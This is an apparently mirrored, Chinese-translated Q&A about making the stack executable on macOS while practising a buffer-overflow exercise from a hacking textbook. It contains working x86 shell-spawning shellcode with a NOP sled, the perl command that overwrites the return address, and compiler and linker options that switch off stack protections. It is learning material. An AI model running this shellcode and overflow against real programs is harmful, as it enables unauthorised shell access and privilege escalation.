如何使堆棧在osx上可執行?
[英]How can you make the stack executable on osx?
問題描述
我目前正在經歷“黑客;剝削的藝術”,並且正在練習在我編寫的一些示例代碼上編寫外殼代碼注入。
我將shell代碼作為環境變量注入。 在lldb中,我可以看到我正在覆蓋返回地址,並且EIP被設置為NOP底座的中間位置。 但是,它隨后拋出“ EXC_BAD_ACCESS”並出現段錯誤。
這是我的shellcode堆棧的一部分:
0xbffffbd8: "SHELL=/bin/sh"
0xbffffbe6: "SHELLCODE=\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff90\xffffff901\xffffffc01\xffffffdb1\xffffffc9\xffffff99\xffffffb0\xffffffa4\xffffffcd\xffffff80j\vXQh//shh/bin\xffffff89\xffffffe3Q\xffffff89\xffffffe2S\xffffff89\xffffffe1\xffffffcd\xffffff80"
0xbffffcdc: "SHLVL=4"
調用lldb ./notesearch $(perl -e 'print "\\x5e\\xfc\\xff\\xbf"x40')執行緩沖區溢出,以下是在出現段錯誤時得到的結果:
Process 21713 stopped
* thread #1: tid = 0xa33bc3, 0xbffffc5e, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2, address=0xbffffc5e)
frame #0: 0xbffffc5e
-> 0xbffffc5e: nop
0xbffffc5f: nop
0xbffffc60: nop
0xbffffc61: nop
我正在使用gcc -g -O0 -fno-stack-protector -D_FORTIFY_SOURCE=0 -fomit-frame-pointer來編譯代碼,並且正在將change_mach_o_flags.py腳本與--no-pie和--executable-heap選項集。
我認為問題在於osx自動將堆棧設置為不可執行。 不幸的是,osx中gcc似乎沒有-z execstack選項。 也沒有可使用的execstack實用程序。
我已經在網上搜索過,無法找到使堆棧在我的編譯代碼中可執行的方法。 有辦法做到這一點嗎?
1 個解決方案
解決方案1
5 已采納 2017-02-19 21:01:11
從Apple開發人員文檔中:
有兩種使堆棧和堆可執行的方法:
將-allow_stack_execute標志傳遞給編譯器。 這使堆棧(而不是堆)可執行。
使用mprotect系統調用將特定的內存頁標記為可執行。 詳細信息超出了本文檔的范圍。 有關更多信息,請參見mprotect的手冊頁。
查看更多: https : //developer.apple.com/library/content/documentation/Security/Conceptual/SecureCodingGuide/Articles/BufferOverflows.html
如何修復“/usr/bin/ld:警告:trap.o:missing.note.GNU-stack 部分暗示可執行堆棧”?
[英]How can I fix "/usr/bin/ld: warning: trap.o: missing .note.GNU-stack section implies executable stack"?
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.